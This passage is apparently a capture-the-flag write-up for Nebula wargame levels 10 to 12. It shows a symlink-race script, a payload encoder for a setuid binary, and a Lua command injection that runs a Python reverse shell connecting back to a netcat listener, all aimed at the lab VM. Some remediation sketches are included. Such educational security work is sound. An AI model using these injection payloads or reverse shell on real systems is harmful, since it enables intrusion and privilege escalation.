<span class="o">[</span>i<span class="o">]</span> About to run server on <span class="o">(</span><span class="s1">'192.168.56.101'</span>, <span class="m">18211</span><span class="o">)</span>
Connecting to <span class="m">192</span>.168.56.101:18211 .. Connected!
Sending file .. wrote file!
Incoming connection from <span class="o">(</span><span class="s1">'192.168.56.101'</span>, <span class="m">41962</span><span class="o">)</span>
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
^Z
<span class="o">[</span><span class="m">1</span><span class="o">]</span>+ Stopped<span class="o">(</span>SIGTSTP<span class="o">)</span> python exploit.py
</code></pre></div>
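<p>Since the race is only won some of the time, a common way to improve the odds is to keep flipping the link in a loop while the binary is started over and over. The following is a sketch of that idea, not the script shown above; <code>flip_link</code> is a hypothetical helper, and it assumes Python 3.3 or newer for <code>os.replace</code> (on older interpreters <code>os.rename</code> does the same job on Linux).</p>
<div class="highlight"><pre><span></span><code>import os
import time


def flip_link(link_path, targets, rounds, delay=0.0):
    """Repoint link_path at each target in turn, `rounds` times over.

    Returns the number of swaps performed.
    """
    tmp_link = link_path + ".tmp"
    flips = 0
    for _ in range(rounds):
        for target in targets:
            os.symlink(target, tmp_link)
            # Renaming over the old link is atomic, so the link never vanishes.
            os.replace(tmp_link, link_path)
            flips += 1
            if delay:
                time.sleep(delay)
    return flips
</code></pre></div>
<p>On the Nebula VM it could be called with the paths from the exploit, for instance <code>flip_link('/home/level10/link', ['/tmp/testfile', '/home/flag10/token'], rounds=10000)</code>, while another shell runs the flag10 binary repeatedly against the listener.</p>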
<p>Testing the password:</p>
<div class="highlight"><pre><span></span><code>level10@nebula:~$ su flag10
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$
</code></pre></div>
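<p>For completeness, the safer alternative mentioned in the <code>access()</code> manual page can be sketched as follows: drop the effective user ID to the real one, open the file, and restore it afterwards. This is an illustration in Python with a hypothetical helper name, <code>open_as_real_user</code>; the real fix would go into the C source of the binary and would also have to treat the group IDs the same way.</p>
<div class="highlight"><pre><span></span><code>import os


def open_as_real_user(path, flags=os.O_RDONLY):
    """Open path with the real UID's permissions instead of the effective UID's."""
    saved_euid = os.geteuid()
    # Drop to the invoking user, so the kernel does the permission check
    # as part of open() itself and there is no separate check to race.
    os.seteuid(os.getuid())
    try:
        return os.open(path, flags)
    finally:
        # Restore the privileged effective UID for the rest of the program.
        os.seteuid(saved_euid)
</code></pre></div>
<p>With this approach there is no gap between check and use: if the invoking user may not read the file, <code>os.open()</code> fails with a permission error, regardless of where a link points at that moment.</p>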
<h2>Level 11 - Exploiting with limited character lengths</h2>
<p>The source code for the setuid binary in this level looks like the following:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdlib.h&gt;</span><span class="w"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;unistd.h&gt;</span><span class="w"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;string.h&gt;</span><span class="w"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;sys/types.h&gt;</span><span class="w"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;fcntl.h&gt;</span><span class="w"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span><span class="w"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;sys/mman.h&gt;</span><span class="w"></span>
<span class="cm">/*</span>
<span class="cm"> * Return a random, non predictable file, and return the file descriptor for it.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="kt">int</span><span class="w"> </span><span class="n">getrand</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">path</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">tmp</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">pid</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fd</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">srandom</span><span class="p">(</span><span class="n">time</span><span class="p">(</span><span class="nb">NULL</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">tmp</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getenv</span><span class="p">(</span><span class="s">"TEMP"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getpid</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">asprintf</span><span class="p">(</span><span class="n">path</span><span class="p">,</span><span class="w"> </span><span class="s">"%s/%d.%c%c%c%c%c%c"</span><span class="p">,</span><span class="w"> </span><span class="n">tmp</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">26</span><span class="p">),</span><span class="w"> </span><span class="sc">'0'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">10</span><span class="p">),</span><span class="w"> </span>
<span class="w"> </span><span class="sc">'a'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">26</span><span class="p">),</span><span class="w"> </span><span class="sc">'A'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">26</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="sc">'0'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">10</span><span class="p">),</span><span class="w"> </span><span class="sc">'a'</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">random</span><span class="p">()</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="mi">26</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">fd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">open</span><span class="p">(</span><span class="o">*</span><span class="n">path</span><span class="p">,</span><span class="w"> </span><span class="n">O_CREAT</span><span class="o">|</span><span class="n">O_RDWR</span><span class="p">,</span><span class="w"> </span><span class="mo">0600</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">unlink</span><span class="p">(</span><span class="o">*</span><span class="n">path</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">fd</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="kt">void</span><span class="w"> </span><span class="n">process</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">length</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">key</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">key</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">length</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="mh">0xff</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">length</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">buffer</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="w"> </span><span class="o">^=</span><span class="w"> </span><span class="n">key</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">key</span><span class="w"> </span><span class="o">-=</span><span class="w"> </span><span class="n">buffer</span><span class="p">[</span><span class="n">i</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">system</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cp">#define CL "Content-Length: "</span>
<span class="kt">int</span><span class="w"> </span><span class="n">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">line</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">buf</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">mem</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">length</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fd</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">path</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fgets</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">line</span><span class="p">),</span><span class="w"> </span><span class="n">stdin</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"reading from stdin"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="n">CL</span><span class="p">,</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">CL</span><span class="p">))</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"invalid header"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">length</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">atoi</span><span class="p">(</span><span class="n">line</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">CL</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">length</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fread</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">stdin</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">length</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"fread length"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">process</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">blue</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">length</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">pink</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">fd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getrand</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="p">(</span><span class="n">blue</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"blue = %d, length = %d, "</span><span class="p">,</span><span class="w"> </span><span class="n">blue</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">pink</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fread</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">),</span><span class="w"> </span><span class="n">stdin</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"pink = %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pink</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">pink</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"fread fail(blue = %d, length = %d)"</span><span class="p">,</span><span class="w"> </span><span class="n">blue</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">pink</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">blue</span><span class="w"> </span><span class="o">-=</span><span class="w"> </span><span class="n">pink</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">mem</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">,</span><span class="w"> </span><span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span><span class="w"> </span><span class="n">MAP_PRIVATE</span><span class="p">,</span><span class="w"> </span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">mem</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">MAP_FAILED</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"mmap"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">process</span><span class="p">(</span><span class="n">mem</span><span class="p">,</span><span class="w"> </span><span class="n">length</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
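<p>This level is not as easy as it first seems. There should be two ways to exploit this code. The first path is taken when the
declared length is smaller than the buffer. Because <code>fread(buf, length, 1, stdin)</code> returns the number of items read (at most 1),
the comparison against <code>length</code> only succeeds for a length of 1, so this path reads exactly one byte into the buffer and then calls
<code>process(buf, length)</code> on it. <code>process()</code> XORs the buffer contents with a running key and hands the result to <code>system()</code>.
So we can easily execute a one-character command with <code>system()</code>. But how do we call <code>getflag</code> with it?</p>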
<p>See the question here <a href="http://stackoverflow.com/questions/556194/calling-a-script-from-a-setuid-root-c-program-script-does-not-run-as-root">http://stackoverflow.com/questions/556194/calling-a-script-from-a-setuid-root-c-program-script-does-not-run-as-root</a></p>
<p>What I tried was the following:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># change to the flag11 home directory</span>
<span class="nb">cd</span> /home/flag11
<span class="c1"># create a bash script in the /home/level11 directory</span>
<span class="nb">echo</span> -e <span class="s1">'#!/bin/bash\n/bin/sh'</span> > ~/s
<span class="c1"># make it executable</span>
chmod +x ~/s
<span class="c1"># set the path to include our home directory</span>
<span class="nv">PATH</span><span class="o">=</span><span class="nv">$PATH</span>:/home/level11/
<span class="c1"># execute the flag11 binary with a payload such that process() will execute</span>
<span class="c1"># system('s'). The char 'r' is XORed with 1, which yields 's'.</span>
<span class="c1"># You may need to repeat this a few times until the proper payload is executed</span>
<span class="c1"># (presumably because the bytes following the payload in the buffer are not always zero).</span>
python -c <span class="s1">'s = "Content-Length: 1\nr"; print(s);'</span> <span class="p">|</span> ./flag11
</code></pre></div>
<p>But it seems that <code>system()</code> doesn't run scripts with setuid privileges...</p>
<p>Next I replaced the bash script with a C program, compiled it, saved the executable to
<code>~/s</code> and tried again:</p>
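<div class="highlight"><pre><span></span><code><span class="cp">#define _GNU_SOURCE</span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span><span class="cp"></span>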
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">**</span><span class="w"> </span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="c1">// flag11 is 988, level11 is 1012</span>
<span class="w"> </span><span class="kt">uid_t</span><span class="w"> </span><span class="n">euid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">geteuid</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">setresuid</span><span class="p">(</span><span class="n">euid</span><span class="p">,</span><span class="w"> </span><span class="n">euid</span><span class="p">,</span><span class="w"> </span><span class="n">euid</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Couldn't set euid and ruid</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"* getuid()=%d, geteuid()=%d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">getuid</span><span class="p">(),</span><span class="w"> </span><span class="n">geteuid</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">system</span><span class="p">(</span><span class="s">"/bin/bash"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>level11@nebula:/home/flag11$ python -c 's = "Content-Length: 1\nr"; print(s);' | ./flag11
Couldn't set euid and ruid
* getuid()=1012, geteuid()=1012
</code></pre></div>
<p>This still doesn't work. This is a bug in the level: the setuid C program should probably not call <code>system()</code>, because, as
<code>man 3 system</code> states:</p>
<blockquote>
<p>system() will not, in fact, work properly from programs with
set-user-ID or set-group-ID privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup.</p>
</blockquote>
<p>Proof that this is a bug can be found here: <a href="http://73696e65.github.io/blog/2015/06/18/exploit-exercises-nebula-11-15/">http://73696e65.github.io/blog/2015/06/18/exploit-exercises-nebula-11-15/</a></p>
<p>The second way to exploit this vulnerability applies when the input is 1024 bytes or longer. For this you need to pre-encode
the payload with the inverse of the <code>process()</code> algorithm. I didn't do this, because it works very similarly to the previous approach.</p>
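<p>For reference, a minimal Python sketch of that pre-encoding step. It assumes <code>process()</code> is a running-key XOR loop: the key starts as the low byte of the length, each byte is XORed with the key, and the decoded byte is then subtracted from the key. Check this against the level's source before relying on it. The helper names <code>process_decode</code>, <code>pre_encode</code> and <code>build_request</code> are made up for this illustration.</p>

```python
def process_decode(buf: bytes) -> bytes:
    """Mirror of the XOR loop assumed for process(): what system() would see."""
    key = len(buf) & 0xFF
    out = bytearray()
    for b in buf:
        plain = b ^ key
        out.append(plain)
        key = (key - plain) & 0xFF  # only the low byte of the key matters
    return bytes(out)


def pre_encode(plain: bytes) -> bytes:
    """Inverse of process_decode(): bytes to send so that decoding yields `plain`."""
    key = len(plain) & 0xFF
    out = bytearray()
    for p in plain:
        out.append(p ^ key)
        key = (key - p) & 0xFF
    return bytes(out)


def build_request(command: bytes, total_len: int = 1024) -> bytes:
    """Header plus encoded body; the command is NUL-padded to total_len bytes."""
    if total_len <= len(command):
        raise ValueError("total_len must leave room for a terminating NUL")
    plain = command + b"\x00" * (total_len - len(command))
    return b"Content-Length: %d\n" % total_len + pre_encode(plain)


if __name__ == "__main__":
    # One-byte case: the byte that must be sent so that 's' gets executed.
    print(pre_encode(b"s"))
    # Long case: check the round trip instead of trusting the encoder blindly.
    body = build_request(b"getflag").split(b"\n", 1)[1]
    print(process_decode(body)[:8])
```

<p>Piping the output of <code>build_request()</code> into <code>./flag11</code> should take the second branch. Whether the command then runs with the <code>flag11</code> privileges is subject to the same <code>system()</code> caveat described above.</p>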
<h2>Level 12 - Command Injections in double quoted strings</h2>
<p>This level is about a simple command injection vulnerability in Lua. The code of the vulnerable program is below:</p>
<div class="highlight"><pre><span></span><code><span class="kd">local</span> <span class="n">socket</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"socket"</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">server</span> <span class="o">=</span> <span class="nb">assert</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">bind</span><span class="p">(</span><span class="s2">"127.0.0.1"</span><span class="p">,</span> <span class="mi">50001</span><span class="p">))</span>
<span class="kr">function</span> <span class="nf">hash</span><span class="p">(</span><span class="n">password</span><span class="p">)</span>
<span class="n">prog</span> <span class="o">=</span> <span class="nb">io.popen</span><span class="p">(</span><span class="s2">"echo "</span><span class="o">..</span><span class="n">password</span><span class="o">..</span><span class="s2">" | sha1sum"</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">)</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">prog</span><span class="p">:</span><span class="n">read</span><span class="p">(</span><span class="s2">"*all"</span><span class="p">)</span>
<span class="n">prog</span><span class="p">:</span><span class="n">close</span><span class="p">()</span>
<span class="n">data</span> <span class="o">=</span> <span class="nb">string.sub</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">40</span><span class="p">)</span>
<span class="kr">return</span> <span class="n">data</span>
<span class="kr">end</span>
<span class="kr">while</span> <span class="mi">1</span> <span class="kr">do</span>
<span class="kd">local</span> <span class="n">client</span> <span class="o">=</span> <span class="n">server</span><span class="p">:</span><span class="n">accept</span><span class="p">()</span>
<span class="n">client</span><span class="p">:</span><span class="n">send</span><span class="p">(</span><span class="s2">"Password: "</span><span class="p">)</span>
<span class="n">client</span><span class="p">:</span><span class="n">settimeout</span><span class="p">(</span><span class="mi">60</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">line</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">client</span><span class="p">:</span><span class="n">receive</span><span class="p">()</span>
<span class="kr">if</span> <span class="ow">not</span> <span class="n">err</span> <span class="kr">then</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"trying "</span> <span class="o">..</span> <span class="n">line</span><span class="p">)</span> <span class="c1">-- log from where ;\</span>
<span class="kd">local</span> <span class="n">h</span> <span class="o">=</span> <span class="n">hash</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="kr">if</span> <span class="n">h</span> <span class="o">~=</span> <span class="s2">"4754a4f4bd5787accd33de887b9250a0691dd198"</span> <span class="kr">then</span>
<span class="n">client</span><span class="p">:</span><span class="n">send</span><span class="p">(</span><span class="s2">"Better luck next time</span><span class="se">\n</span><span class="s2">"</span><span class="p">);</span>
<span class="kr">else</span>
<span class="n">client</span><span class="p">:</span><span class="n">send</span><span class="p">(</span><span class="s2">"Congrats, your token is 413**CARRIER LOST**</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="kr">end</span>
<span class="kr">end</span>
<span class="n">client</span><span class="p">:</span><span class="n">close</span><span class="p">()</span>
<span class="kr">end</span>
</code></pre></div>
<p>It opens a server on localhost:50001 and asks for a password. The password is then hashed with some shell utilities
in a <code>popen()</code> call and compared with the SHA-1 sum <code>4754a4f4bd5787accd33de887b9250a0691dd198</code>. But of course
we don't need to find the password that hashes to the target value. We can just inject a command and then
launch a backdoor.</p>
<p>To exploit it, I created a simple connect-back backdoor (reverse backdoor) script in Python
(inspired by <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a>):</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="kn">import</span> <span class="nn">socket</span><span class="o">,</span><span class="nn">subprocess</span><span class="o">,</span><span class="nn">os</span>
<span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s2">"127.0.0.1"</span><span class="p">,</span><span class="mi">8888</span><span class="p">))</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">0</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">1</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">2</span><span class="p">)</span>
<span class="n">p</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">call</span><span class="p">([</span><span class="s2">"/bin/sh"</span><span class="p">,</span><span class="s2">"-i"</span><span class="p">])</span>
</code></pre></div>
<p>Then I saved it to <code>/tmp/bd.py</code> and launched the attack:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># first start listening for incoming backdoor connections</span>
nc -l localhost <span class="m">8888</span>
<span class="c1"># then attack in a different shell terminal</span>
<span class="nb">cd</span> /home/flag12
<span class="nb">echo</span> -e <span class="s1">'$(/tmp/bd.py)\n'</span> <span class="p">|</span> nc localhost <span class="m">50001</span>
</code></pre></div>
<p>The overall command that the Lua script executes becomes <code>echo $(/tmp/bd.py) | sha1sum</code>.
The shell performs command substitution on the string inside <code>$(..)</code> and thus executes the backdoor:</p>
<div class="highlight"><pre><span></span><code>level12@nebula:~$ netcat -l localhost <span class="m">8888</span>
sh: no job control <span class="k">in</span> this shell
sh-4.2$ getflag
getflag
You have successfully executed getflag on a target account
sh-4.2$
</code></pre></div>
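<p>The injection can also be reasoned about without the server. The following Python sketch rebuilds the command string the way the Lua <code>hash()</code> function does and contrasts it with two safer variants. The function names are hypothetical, and the quoted and <code>hashlib</code> versions are suggested alternatives, not part of the level.</p>

```python
import hashlib
import shlex


def build_command(password: str) -> str:
    """Same concatenation as the Lua hash(): the input reaches the shell unquoted."""
    return "echo " + password + " | sha1sum"


def build_command_quoted(password: str) -> str:
    """Quoting the input makes the shell treat $(...) as literal text."""
    return "echo " + shlex.quote(password) + " | sha1sum"


def hash_without_shell(password: str) -> str:
    """Hash in-process; the trailing newline mimics what echo would append."""
    return hashlib.sha1((password + "\n").encode()).hexdigest()


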